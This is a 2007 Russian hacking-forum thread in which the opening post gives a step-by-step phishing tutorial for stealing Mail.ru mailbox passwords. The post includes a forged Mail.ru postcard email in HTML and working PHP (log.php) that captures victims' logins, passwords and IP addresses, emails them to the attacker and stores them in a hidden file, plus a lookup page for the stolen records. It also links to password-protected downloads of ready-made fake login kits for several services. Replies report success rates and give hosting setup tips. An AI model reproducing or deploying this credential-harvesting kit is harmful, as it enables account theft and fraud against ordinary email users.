Создание Фейка(Взлом ящика)

Discussion in 'Уязвимости Mail-сервисов' started by misterio, 15 Aug 2007.

Thread Status:
Not open for further replies.
  1. misterio

    misterio Member

    Joined:
    24 May 2007
    Messages:
    6
    Likes Received:
    9
    Reputations:
    1
    Итак, что нам нужно:
    1. Хостинг где-нибудь(например holm.ru)
    2. Прямые руки(в том числе и finger.dll) ;)
    3. И ящик жертвы

    1 Этап - Теория.
    Как же оно работает:
    Просто при заходе на сайт вы пишите своё имя и пароль в системе, а как мы это отправим смотрите дальше.
    2 Этап - Отправка письма.
    Значит можем дать просто ссылку на сайт или так отправить:
    Нажимаем "Написать письмо", пишем кому, в поле "Тема" вводим "Вам пришла открытка", а сообщении пишем:

    PHP:
    <table class=readlet cellpadding=0 cellspacing=0 border=0 width="100%"><tr>
    <
    td>
    <
    div id=let_body><base href="http://win.mail.ru/cgi-bin/readmsg"><table cellspacing=0 cellpadding=5><tr valign=top>
    <
    td><a href="http://cards.mail.ru" target="_blank"><img src="http://images.cards.mail.ru/2006/avatar.gif" width=90 height=90 border=0></a></td>
    <
    td><font color="#333333" face="Arial" size="2">

    Здравствуйтена Ваше имя отправлена открытка.<br>
    Отправитель открыткиОткрытки@Mail.Ru &lt;cards@cards.mail.ru&gt;</br><br>

    Открытку Вы можете посмотреть в течение 90 дней по ссылке<br>
    <
    a href="ССЫЛКА НА ВАШ САЙТ" target="_self"><font color=#0857A6>http://cards.mail.ru/card.html?cd=7b5fd891edc9120c2cd5c7abe302a1cc</font></a><br>
    Нажмите на неё или скопируйте ссылку в адресную строку интернет-браузера.<br><br>
    <
    br>
    <
    hr align="left" color="silver" size="1" width="100%">
    Чтобы своевременно узнавать о ближайших праздникахименинниках и конкурсах,<br>

    <
    a href="http://content.mail.ru/pages/p_782.html" target="_blank" _base_href="http://win.mail.ru/cgi-bin/readmsg"подпишитесь на рассылку</a>.
    <
    br><br>
    <
    a href="http://cards.mail.ru/" target="_blank" _base_href="http://win.mail.ru/cgi-bin/readmsg"><font color="#0857a6">Открытки@Mail.Ru</font></a> - открытки на все случаи жизни!<br><br><br>
    Потом жмём "расширанный режим" и жмём отправить...
    Жертва прочитаем письмо, пройдёт по ссылке и напишет там свой пароль(Проверено - 99%)

    3 Этап - Создание Собственного Фейка
    Итак, рассмотрим способ создания фейка. Заходите на панель авторизации пользователя и нажимаете "Сохранить как" сохраняете её и потом переимёновываете в "index.php".
    Затем создаем файл "base.php" и записываем туда следующее:
    PHP:
    <? print "<center><h1>Stop!!!! Access Denide!</h1></center>"; exit; ?>
    Это чтобы никто не смог посмотреть базу.
    Создаете файл log.php и пихаете туда:
    PHP:
    <?PHP
    $Login 
    $_POST['login']; //Логин
    $Domain $_POST['domain'];   
    $Pass $_POST['password']; // Пароль
    $ip $_SERVER["REMOTE_ADDR"]; // IP Жертвы
    $Data date("d-m-y H:i:s"time()); // Дата и время

    $text "[$Data] IP:$ip Мыло:$Login@$Domain Пасс:$Pass";
    $to "ВАШЕ МЫЛО"// кому присылаем данные ( E-mail адресс )
    $sub " Пароль от ящика: $Login@$Domain"// тема письма
    mail($to,$sub,$text); // Отсылаем сообщение о пополнении базы на E-mail

    $filelog fopen("base.php","a+"); //открываем файл базы
    fwrite($filelog,"\n $text \n"); //записываем всё
    fclose($filelog); //закрываем

    echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL=http://cards.mail.ru/card.html?cdu=8fe03702cc03252da65651e35e098d9d'></head></html>"// куда пошлем пользователя после того как он ввел данные!
    ?>
    Тут всякие настройки.
    И последнее, создаём файл seebase.php и пихаем туда:
    PHP:
    <html>
        <head>
            <title>Give E-mail</title>
        </head>
        <body>
            <form method="POST">
            Login: <input type="text" name="login">
            <br>
            <input type="submit" value="OK">
            </form>
            <?php
                
    if (isset($_POST['login']))
                if (
    $_POST['login'] != '')
                {
                    
    $login $_POST['login'];
                    echo 
    $_POST['login'].'<BR>';
                    
    $fp fopen('base.php''r');// Имя базы
                    
    while (!feof ($fp)) {
                        
    $buffer fgets($fp);
                        if (
    strpos($buffer,$login) !== false)
                        {
                            echo 
    $buffer.'<BR>';
                            break;
                        }
                    }
                    
    fclose($fp);
                }
            
    ?>
        </body>
    </html>
    Это чтобы видеть базу через вебку, но лучше копировать с ftp base.php, чтобы лишние глаза не смогли посмотреть базу через seebase.php

    Впринципе всё с этапом 3!



    P.S. Скоро напишу как создавать фейки для других почтовых сервисов
    P.S.S. Задавайте вопросы тут...

    Готовые Фейки:
    Mail.ru Фейк:
    Ссылка:http://slil.ru/24741643
    Пасс:feikmailru

    Все фейки(Mail.ru;Rambler;UcoZ и Yandex.ru)
    Ссылка: http://slil.ru/24745423
    Пасс: allfeiks

    Видео по использованию Фейка:
    Ссылка: http://slil.ru/24745566
    Пасс: videofeik
     
    #1 misterio, 15 Aug 2007
    Last edited: 16 Aug 2007
    8 people like this.
  2. cataha01

    cataha01 New Member

    Joined:
    11 Apr 2007
    Messages:
    17
    Likes Received:
    3
    Reputations:
    -1
    Сам не проверял но на мне пробовали ...
    Способ рабочий если несмотрят на адресную строку ....

    А вобще 50% поведуться
     
  3. DJ.KilleR

    DJ.KilleR Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    557
    Likes Received:
    297
    Reputations:
    2
    за страния плюс всё же поставлю..
     
  4. Moldman

    Moldman Elder - Старейшина

    Joined:
    12 Jun 2007
    Messages:
    91
    Likes Received:
    35
    Reputations:
    -5
    вроде работает
     
  5. HloR09

    HloR09 New Member

    Joined:
    8 Jul 2007
    Messages:
    12
    Likes Received:
    2
    Reputations:
    0
    А без расширенного режима можно как нибудь написать письмицо со скриптом , а то у меня на ящике нет расширенного режима или его надо включать в опциях почтовика
     
  6. misterio

    misterio Member

    Joined:
    24 May 2007
    Messages:
    6
    Likes Received:
    9
    Reputations:
    1
    HloR09
    какая у тебя почта? Mail? Если маил, то чтобы увидеть эту кнопку ты должен юзать Internet Explorer
     
  7. Freki

    Freki New Member

    Joined:
    17 Aug 2007
    Messages:
    2
    Likes Received:
    2
    Reputations:
    0
    Только расскажите пожалуйста как пользоваться фейком для Ucoz?
     
  8. Moldman

    Moldman Elder - Старейшина

    Joined:
    12 Jun 2007
    Messages:
    91
    Likes Received:
    35
    Reputations:
    -5
    Сможешь сделать фейк для Yahoo?
    Пожалуйста
     
  9. ya_mag

    ya_mag Elder - Старейшина

    Joined:
    18 Jan 2007
    Messages:
    52
    Likes Received:
    8
    Reputations:
    10
    Пользуйся на здоровье :) yahoo
     
    #9 ya_mag, 20 Aug 2007
    Last edited: 20 Aug 2007
  10. multic

    multic New Member

    Joined:
    11 Jul 2007
    Messages:
    1
    Likes Received:
    1
    Reputations:
    -1
    Привет!Помоги еще чуток!Ответь ток пожалуйста на 2 вопроса:
    1)зарегился я на holm.ru (куда все файлы закидывать надо) ? в раздел закачки все 4 файла иль их по разным разделам.
    Подскажи те еще какие нить хосты где работает.А то holm лагает и еле еле прогружается!
    2)в том что ты залито уже готовое тока в log.php над изменить файл ( там над поставить свое мыло вместо olya.88 вроде) иль еще что нить над изменять?
    Буду очень благодарен за помощь!
     
    1 person likes this.
  11. ya_mag

    ya_mag Elder - Старейшина

    Joined:
    18 Jan 2007
    Messages:
    52
    Likes Received:
    8
    Reputations:
    10
    всё будет работать и на холме! для работы также сгодится любой бесплатный хостинг с php! если не нравится холм попробуй fatal.ru все файлы кладутся в одну папку! файл seebase.php можеш вобще не ложить! он как такавой нафиг не нужен :) правиш log.php под себя и ставиш чмоды на base.php 666 вот и всё!
     
  12. wano81

    wano81 New Member

    Joined:
    23 Oct 2006
    Messages:
    25
    Likes Received:
    4
    Reputations:
    5
    Товарищи просьба указывать копирайты тема в сети висит достаточно давно
    inattack.ru
     
  13. stalles

    stalles Elder - Старейшина

    Joined:
    19 Jul 2005
    Messages:
    107
    Likes Received:
    19
    Reputations:
    -3
    ети фейки делаются за 1 минуту, на любую почту и нетолько :)
    И ето старое.
    Эту тему нужно удалит, сами знаете почему.
     
  14. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    798
    Likes Received:
    710
    Reputations:
    301
    Зачем такие бояны постить? =\
     
Thread Status:
Not open for further replies.